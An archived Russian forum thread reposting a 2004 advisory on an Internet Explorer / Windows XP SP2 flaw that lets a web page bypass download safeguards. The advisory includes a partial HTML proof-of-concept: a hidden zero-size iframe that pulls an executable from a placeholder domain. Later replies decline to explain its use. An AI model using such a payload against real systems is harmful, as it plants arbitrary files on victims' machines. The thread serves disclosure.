PDA

Просмотр полной версии : Обход ограничений в Microsoft IE на Windows XP SP2



Geser
24.11.2004, 10:09
Программа: Microsoft Internet Explorer (IE) на Windows XP SP2
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость обнаружена в Microsoft Internet Explorer на Windows XP SP2. Удаленный атакующий может загрузить на уязвимую систему произвольный файл.

Удаленный атакующий может с помощью специально сформированной web страницы обойти ограничения безопасности для 'File Download' и 'File Open' и загрузить произвольный файл на уязвимую систему. Уязвимость реализуется посредством ответа сервера на запрос сообщением HTTP 404 error и вызова метода execCommand. Пример:


<html>
< body>
< iframe src=&#039;http://your.domain.com/v.exe?.htm&#039; name=
"NotFound" width="0" height="0"></iframe>
Click here (#).
< /body>
< /html>

URL производителя: www. microsoft.com

Решение: решение на данный момент не существует

Gnusmus
23.03.2005, 04:25
Извините Я "полный чайник" :&#039;(, и незню куда этот код всунуть(часто натыкаешся на такие штуки и ...). Если Вам нетрудно и есть минута на такого тугодума как Я немоглибы Вы это дело поподробнее разьяснить. Что с этим делать, как компилировать чем, и надо ли это вообще. Или мот ссылочки посоветуете с инфой.Заранее благодарен:)

Geser
23.03.2005, 09:49
Извините Я "полный чайник" :&#039;(, и незню куда этот код всунуть(часто натыкаешся на такие штуки и ...). Если Вам нетрудно и есть минута на такого тугодума как Я немоглибы Вы это дело поподробнее разьяснить. Что с этим делать, как компилировать чем, и надо ли это вообще. Или мот ссылочки посоветуете с инфой.Заранее благодарен:)

Мы не занимаемся созданием експлоитов. НМы с ними боремся :)

Jolly Rojer
23.03.2005, 09:58
Мы не занимаемся созданием експлоитов. НМы с ними боремся :)


А код желательно всеже стереть ;D